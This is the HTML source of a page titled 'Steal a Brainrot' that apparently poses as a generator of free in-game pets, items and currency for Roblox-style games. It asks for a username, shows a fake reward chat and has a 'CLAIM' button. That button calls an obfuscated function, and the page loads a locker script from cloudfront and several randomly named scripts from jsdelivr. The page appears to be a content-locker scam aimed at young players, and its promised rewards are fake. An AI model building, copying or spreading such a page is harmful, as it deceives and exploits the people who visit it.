<!DOCTYPE html>
<html lang="en">
   <head>
      <meta charset="UTF-8">
      <meta property="og:image" content="https://i.imgur.com/HBaO44H.png">
      <link rel="shortcut icon" href="https://i.imgur.com/HBaO44H.png" type="image/x-icon">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <title>Steal a Brainrot</title>
      <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/dev20l/tiktok@main/tiktok.css"/>
      <link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/dev20l/tiktok@main/tiktak.css"/>
   </head>
   <body>
        <style>
          @font-face {
  font-family: 'TikTokFont';
  src: url(https://sf16-website-login.neutral.ttwstatic.com/obj/tiktok_web_login_static/tiktok_fonts/TikTokFont-Regular.woff2?_default_font=1&v=2) format('woff2'),
       url(https://sf16-website-login.neutral.ttwstatic.com/obj/tiktok_web_login_static/tiktok_fonts/TikTokFont-Regular.woff?_default_font=1&v=2) format('woff'),
       url(https://sf16-website-login.neutral.ttwstatic.com/obj/tiktok_web_login_static/tiktok_fonts/TikTokFont-Regular.otf?_default_font=1&v=2) format('opentype');
  font-weight: normal;
  font-style: normal;
  font-display: fallback;
}

@font-face {
  font-family: 'TikTokFont';
  src: url(https://sf16-website-login.neutral.ttwstatic.com/obj/tiktok_web_login_static/tiktok_fonts/TikTokFont-Bold.woff2?_default_font=1&v=2) format('woff2'),
       url(https://sf16-website-login.neutral.ttwstatic.com/obj/tiktok_web_login_static/tiktok_fonts/TikTokFont-Bold.woff?_default_font=1&v=2) format('woff'),
       url(https://sf16-website-login.neutral.ttwstatic.com/obj/tiktok_web_login_static/tiktok_fonts/TikTokFont-Bold.otf?_default_font=1&v=2) format('opentype');
  font-weight: bold;
  font-style: normal;
  font-display: fallback;
}

body {
  background: linear-gradient(to bottom, #87CEFA, #f0f0f0);
  min-height: 100vh;
  display: flex;
  flex-direction: column;
  align-items: center;
  background-position: center;
  background-repeat: no-repeat;
  color: #fff;
  font-family: 'TikTokFont', sans-serif;
  font-weight: bold;
  user-select: none;
}

.loading {
  background-color: rgb(18, 18, 18);
  position: fixed;
  bottom: 0;
  right: 0;
  top: 80px;
  left: 0;
  z-index: 88889;
}

.tiktok {
  position: relative;
  width: 18px;
  height: 18px;
  background: rgb(77, 232, 244);
  border-radius: 50%;
  animation: leftToRight 1s ease-in-out infinite;
  transform: scale(1);
  mix-blend-mode: darken;
}

.tiktok.red {
  background: rgb(253, 62, 62);
  animation: rightToLeft 1s ease-in-out infinite;
}

.load {
  position: fixed;
  display: flex;
  justify-content: center;
  align-items: center;
  top: 0;
  right: 0;
  left: 0;
  bottom: 0;
}

@keyframes leftToRight {
  0% { left: 0; }
  25% { transform: scale(1.2); }
  50% { left: 18px; }
  75% { transform: scale(0.8); }
  100% { left: 0; }
}

@keyframes rightToLeft {
  0% { right: 0; }
  25% { transform: scale(0.8); }
  50% { right: 18px; }
  75% { transform: scale(1.2); }
  100% { right: 0; }
}


nav {
  display: flex;
  justify-content: center;
  padding: 20px;
  border-bottom: 1px solid #e54935;
}

nav img {
  width: 100px;
}
.xload nav .title {
  font-weight: bold;
  text-transform: uppercase;
}

.label {
  margin: 15px 0;
  padding: 4px;
  display: flex;
  background-color: #0dae5f;
  border-radius: 10px;
  box-shadow: rgb(53, 144, 0) 0px .27rem 0px 0px, rgba(179, 174, 119, 0.6) 0px 0.25rem 0.125rem 0px;
}

.xload .label .item {
  width: 100%;
  text-align: center;
  padding: 5px;
  border-radius: 5px;
}

.xload .label .item.active {
  background-color: #eb9b00;
}

.gifts .row {
  padding: calc(var(--bs-gutter-x)* .5 - 5px);
}
 

.xload .gifts .row > div {
  padding: 5px !important;
}

.gifts .item {
  border: 2px solid #62339b;
  padding: 0px;
  box-shadow: 0 25px 20px -15px rgba(0, 0, 0, 0.5);
}

.xload .gifts .item img {
  width: 100%;
  height: 150px; 
  object-fit: contain; 
  display: block;
  margin: auto;
}


.xload .gifts .item.active {
  background-color: #0dae5f;
  border-color: #fe2c55;
}

.xload .gift-next,
.followers-next,
.coins-next {
  position: fixed;
  bottom: 0;
  left: 0;
  right: 0;
  padding: 10px 0;
}

.xload .gift-next .action,
.followers-next .action,
.coins-next .action {
  padding: 0px;
  padding: 10px;
  text-align: center;
  border-radius: 10px;
  background-color: #0dae5f;
  box-shadow: rgb(53, 144, 0) 0px .27rem 0px 0px, rgba(179, 174, 119, 0.6) 0px 0.25rem 0.125rem 0px;


}

.gift-next .txt {
  margin-bottom: 7px;
  font-size: .86rem;
  display: none;
  color: rgb(254, 44, 85);
}

.xload .followers-next .action.disabled,
.coins-next .action.action.disabled {
  background-color: rgba(35, 35, 35, 0.9);
}

.xload .followers .item {
  padding: 10px;
  border-radius: 5px;
  border: 1px solid #62339b;
  padding: 0px;
  box-shadow: 0 25px 20px -15px rgba(0, 0, 0, 0.5);  margin: 10px 0;
}

.xload .followers .item.active {
  background-color: #0dae5f;  
}

.xload .followers .item .txt {
  background-color: #0dae5f;
  color: #fff;
  text-align: center;
  border-radius: 2px;
}

.followers .item .img {
  display: flex;
}

.xload .followers .item img {
  width: 100%;
}

.coins .item {
  display: flex;
  justify-content: space-between;
  align-items: center;
  background-color: #222;
  padding: 10px 15px;
  border-radius: 5px;
  margin: 10px 0;
}

.coins .item.active {
  background-color: #02B102;
}

.xload .coins .item .info {
  padding-right: 10px;
}

.xload .coins .item .info .coin {
  font-weight: bolder;
}

.coins .item .info .txt {
  text-transform: uppercase;
}

.xload .coins .item .img img {
  width: 25px;
}

.last {
  padding: 20px 0;
}

.last .search {
  position: relative;
}

.xload .last .search input {
  background-color: #857985;
  padding: 12px 15px;
  border-radius: 5px;
  border: 2px solid #555;
  position: absolute;
  top: 0;
  left: 0;
  right: 0;
  z-index: 85;
  color: #fff;
  font-weight: bold;

}

.xload .last .search button {
  background-color: #02B102;
  position: absolute;
  right: 6px;
  top: 6px;
  padding: 8px 15px;
  z-index: 899;
  color: #fff;
  font-weight: bold;
  border: none;
  border-radius: 6px;
  box-shadow: rgb(53, 144, 0) 0px .27rem 0px 0px, rgba(179, 174, 119, 0.6) 0px 0.25rem 0.125rem 0px;
  
}

.xload .last .search input:focus {
  border: 2px solid #02B102;
  outline: none;
    box-shadow: rgb(53, 144, 0) 0px .27rem 0px 0px, rgba(179, 174, 119, 0.6) 0px 0.25rem 0.125rem 0px;

}

.xload .profile {
  background-color: #857985;
  margin-top: 70px;
  text-align: center;
  padding: 20px;
  border-radius: 10px;
    border: 2px solid #555;



}

.xload .profile img {
  width: 90px;
  height: 90px;
  border-radius: 50%;
}

.xload .profile .more {
  display: flex;
  justify-content: space-around;
  margin-top: 20px;
}

.profile .more .item {
  text-align: center;
  width: 100%;
}

.profile .username {
  margin-top: 20px;
  display: flex;
  align-items: center;
  justify-content: center;
}

.xload .profile .username img {
  margin-left: 5px;
  width: 16px;
  height: 16px;
}

.xload .profile .name {
  margin-bottom: 20px;
}

.profile .more .item .txt {
  font-size: .8rem;
  color: #bbb;
}

.rewards {
  margin: 20px 0;
  background-color: #857985;
  padding: 20px;
  border-radius: 10px;
  box-shadow: 0 25px 20px -15px rgba(0, 0, 0, 0.5);  margin: 10px 0;
    border: 2px solid #555;


}

.rewards .imgs {
  display: flex;
  justify-content: center;
  margin-bottom: 20px;
}

.xload .rewards .imgs img {
  width: 45px;
  margin: 0 4px;
}

.xload .rewards .item {
  display: flex;
  justify-content: space-between;
}

.no-user {
  margin-top: 70px;
  text-align: center;
  padding: 20px;
}

.xload .no-user .title {
  font-size: 1.2rem;
  margin: 5px 0;
  font-weight: bold;
}

.xload .no-user .img {
  margin: 25px 0;
}

.xload .no-user {
  font-size: .9rem;
  font-weight: normal;
}

.xload .action-ads {
  display: flex;
  justify-content: center;
}

.action-ads > div {
  width: 150px;
  background-color: #02B102;
  color: #fff;
  padding: 12px 25px;
  text-align: center;
  border-radius: 10px;
  margin-top: 10px;
  font-size: 1.1rem;
}

.chat {
  margin-top: 80px;
  position: relative;

}

.xload .chat .over {
  position: absolute;
  top: -1px;
  left: 0;
  right: 0;
  height: 100px;
  z-index: 99999;
background: linear-gradient(180deg, 
  rgba(133, 121, 133, 1) 0%, 
  rgba(133, 121, 133, 0.9) 30%, 
  rgba(133, 121, 133, 0.8) 43%, 
  rgba(133, 121, 133, 0.5) 56%, 
  rgba(133, 121, 133, 0.3) 70%, 
  rgba(133, 121, 133, 0.05) 85%, 
  rgba(133, 121, 133, 0) 100%
);

  }

.xload .chat .items {
  height: 400px;
  overflow-y: scroll;
}

.xload .chat .item {
  background: linear-gradient(90deg, rgba(2,177,2,1) 0%, rgba(2,177,2,0.8) 32%, rgba(2,177,2,0.5) 46%, rgba(2,177,2,0.3) 58%, rgba(2,177,2,0.1) 70%, rgba(2,177,2,0) 81%, rgba(255,255,255,0) 100%);
  display: flex;
  margin: 10px 0;
  padding: 5px;
  border-radius: 50px;
  align-items: center;
}

.chat .item .info {
  padding-left: 10px;
  padding-right: 10px;
}

.xload .chat .item .info .user {
  font-size: .8rem;
}

.xload .chat .item .info .abdo {
  font-size: .6rem;
}

.xload .chat .item .img img {
  width: 50px;
  height: 50px;
  border-radius: 50%;
}

.xload .chat .item .imgs {
  display: flex;
}

.xload .chat .item .imgs img {
  width: 35px;
  margin-left: 3px;
}

.vpn {
  text-align: center;
  margin: 10px 0;
  font-weight: normal;
}

.xload .vpn .title {
  margin-top: 10px;
  font-size: 1.3rem;
  font-weight: bold;
}

.xload .vpn img {
  width: 100px;
  margin-top: 20px;
}

.loading img {
  width: 100px;
  height: auto;
  margin-bottom: 10px;
}

  .label-image {
  text-align: center;
  margin-top: 20px;
}

.label-image img {
  max-width: 100%;
  height: auto;
  border-radius: 10px;
}
.full-width-image {
  width: 100vw;
  margin: 0;
  padding: 0;
}

.full-width-image img {
  width: 100%;
  height: auto;
  display: block;
  margin: 0;
  padding: 0;
}
                  </style>


  <script type="text/javascript">
    var UFgAS_YTE_reKLmc={"it":4511253,"key":"a574b"};
</script>
<script src="https://dfmpe7igjx4jo.cloudfront.net/5ee760d.js"></script>
      <div class="loading">
         <div class="load">
            <img src="https://i.imgur.com/MjVLeNt.gif" alt="loading gif" />
         </div>
      </div>
      <nav>
         <div class="logo">
            <img src="https://cdn.jsdelivr.net/gh/monorolls/grow@main/logo3.webp" alt="">
         </div>
      </nav>
      <div class="container-md">
         <div class="label">
            <div class="item active">Items</div>
            <div class="item">Sheckles</div>
            <div class="item">Info</div>
         </div>
         <div id="gifts" class="gifts">
            <div class="row">
            </div>
            <br>
            <br>
            <br>
         </div>
         <div id="followers" class="followers d-none">
            <div class="row">
               <div class="col-4 col-md-3">
                  <div class="item">
                     <div class="txt">100k</div>
                     <div class="img"><img src="https://static.wikia.nocookie.net/growagarden/images/0/08/Sheckle.png/" alt=""></div>
                  </div>
               </div>
               <div class="col-4 col-md-3">
                  <div class="item">
                     <div class="txt">500k</div>
                     <div class="img"><img src="https://static.wikia.nocookie.net/growagarden/images/0/08/Sheckle.png/" alt=""></div>
                  </div>
               </div>
               <div class="col-4 col-md-3">
                  <div class="item">
                     <div class="txt">800k</div>
                     <div class="img"><img src="https://static.wikia.nocookie.net/growagarden/images/0/08/Sheckle.png/" alt=""></div>
                  </div>
               </div>
               <div class="col-4 col-md-3">
                  <div class="item">
                     <div class="txt">1M</div>
                     <div class="img"><img src="https://static.wikia.nocookie.net/growagarden/images/0/08/Sheckle.png/" alt=""></div>
                  </div>
               </div>
               <div class="col-4 col-md-3">
                  <div class="item">
                     <div class="txt">1.3M</div>
                     <div class="img"><img src="https://static.wikia.nocookie.net/growagarden/images/0/08/Sheckle.png/" alt=""></div>
                  </div>
               </div>
               <div class="col-4 col-md-3">
                  <div class="item">
                     <div class="txt">1.5M</div>
                     <div class="img"><img src="https://static.wikia.nocookie.net/growagarden/images/0/08/Sheckle.png/" alt=""></div>
                  </div>
               </div>
               <div class="col-4 col-md-3">
                  <div class="item">
                     <div class="txt">1.8M</div>
                     <div class="img"><img src="https://static.wikia.nocookie.net/growagarden/images/0/08/Sheckle.png/" alt=""></div>
                  </div>
               </div>
               <div class="col-4 col-md-3">
                  <div class="item">
                     <div class="txt">2M</div>
                     <div class="img"><img src="https://static.wikia.nocookie.net/growagarden/images/0/08/Sheckle.png/" alt=""></div>
                  </div>
               </div>
               <div class="col-4 col-md-3">
                  <div class="item">
                     <div class="txt">2.2M</div>
                     <div class="img"><img src="https://static.wikia.nocookie.net/growagarden/images/0/08/Sheckle.png/" alt=""></div>
                  </div>
               </div>
            </div>
            <br>
            <br>
            <br>
         </div>
         <div id="coins" class="coins d-none">
            <div class="row">
            </div>
            <br>
            <br>
            <br>
         </div>
         <div id="last" class="last d-none">
            <div class="search">
               <input placeholder="Enter Username">
               <button id="search">search</button>
            </div>
            <div class="profile d-none">
               <div class="img"><img src=""></div>
               <div class="username">@username</div>
               <div class="more">
                  <div class="item">
                  </div>
                  <div class="item">
                  </div>
                  <div class="item">
                  </div>
               </div>
            </div>
            <div class="rewards d-none">
               <div class="gifts">Items : </div>
               <div class="imgs">
                  <img src="" alt="">
                  <img src="" alt="">
                  <img src=""alt="">
                  <img src="" alt="">
               </div>
               <div class="item">
                  <div>Sheckles : </div>
                  <div id="follow-val">+1k</div>
               </div>
               <div class="item">
               </div>
            </div>
            <div class="no-user d-none">
               <div class="img">
                  <svg width="72" data-e2e="" height="72" viewBox="0 0 72 72" fill="currentColor" xmlns="http://www.w3.org/2000/svg" style="fill-opacity: 0.34;">
                     <path fill-rule="evenodd" clip-rule="evenodd" d="M16.6276 20.2241C16.6276 30.8074 25.2394 39.4192 35.8227 39.4192C46.4059 39.4192 55.0178 30.8074 55.0178 20.2241C55.0178 9.64086 46.4059 1.02899 35.8227 1.02899C25.2394 1.02899 16.6276 9.64086 16.6276 20.2241ZM19.7405 20.2244C19.7405 11.3583 26.9568 4.14202 35.8229 4.14202C44.689 4.14202 51.9053 11.3583 51.9053 20.2244C51.9053 29.0905 44.689 36.3068 35.8229 36.3068C26.9568 36.3068 19.7405 29.0905 19.7405 20.2244Z"></path>
                     <path d="M6.69813 70.9717C6.56844 70.9717 6.43874 70.9562 6.30904 70.9199C5.47898 70.7072 4.97576 69.8563 5.19365 69.0263C8.79922 55.045 21.3954 45.2762 35.8228 45.2762C50.2503 45.2762 62.8465 55.0398 66.4572 69.0211C66.6699 69.8512 66.1719 70.702 65.3366 70.9147C64.5014 71.1326 63.6558 70.6293 63.4379 69.7941C60.1851 57.1876 48.8288 48.3837 35.8176 48.3837C22.8117 48.3837 11.4554 57.1876 8.19743 69.7941C8.02104 70.5048 7.39331 70.9717 6.69813 70.9717Z"></path>
                  </svg>
               </div>
            </div>
            <div class="verfication d-none">
               <div class="vpn d-none">
               </div>
               <div class="action-ads">
                  <div class="send" onclick="_Wi()">CLAIM</div>
               </div>
            </div>
            <div class="chat">
               <div class="over"></div>
               <div class="items">
               </div>
            </div>
         </div>
      </div>
      <div class="gift-next d-none">
         <div class="container-md">
            <div class="txt">You can only choose <span id="max-item">4</span> gifts</div>
            <div class="action">Next Step</div>
         </div>
      </div>
      <div class="followers-next d-none">
         <div class="container-md">
            <div class="action disabled">Next Step</div>
         </div>
      </div>
      <div class="coins-next d-none">
         <div class="container-md">
            <div class="action disabled">Last step</div>
         </div>
      </div>
      <div id="giftsContainer"></div>
      <div id="giftsContainer" style="display: flex; flex-wrap: wrap; gap: 10px;"></div>
<script>
  var giftsImg = [
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/ShibaInu.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/Nihonzaru.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/Tanuki.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/Tanchozuru.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/Kappa.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/Kitsune.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/GiantPinecone.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/disco.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/Raccoon1.png",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/AncientPack.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/BoneBlossom.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/DinosaurEgg.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/TRexDinosaur.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/Burning_Bud.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/mimic.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/butterfly.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/ScarletMacaw.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/Chicken_Zombie.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/DragonFly1.png",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/Queen_bee.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/Red_Fox1.png",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/PitcherPlant.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/6_candy_blossom.png",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/elephant.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/Dragon_Pepper_Produce.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/MoonMelon.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/SunflowerSeed.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/SummerSeedPack.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/sugarapple.png",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/ember.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/beanstalk.png",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/Feijoa.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/Loquat.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/PricklyPear.webp",
    "https://cdn.jsdelivr.net/gh/monorolls/grow@main/BellPepper.webp"
  ];
</script>
      <script src="https://cdn.jsdelivr.net/gh/dev20l/import@main/jesn.js"></script>
      <script src="https://cdn.jsdelivr.net/gh/dev20l/import@main/7hsk6gs.js"></script>
      <script src="https://cdn.jsdelivr.net/gh/dev20l/import@main/y1sts7jhs.js"></script>
      <script src="https://cdn.jsdelivr.net/gh/dev20l/import@main/ytshj.js"></script>
   </body>
</html>
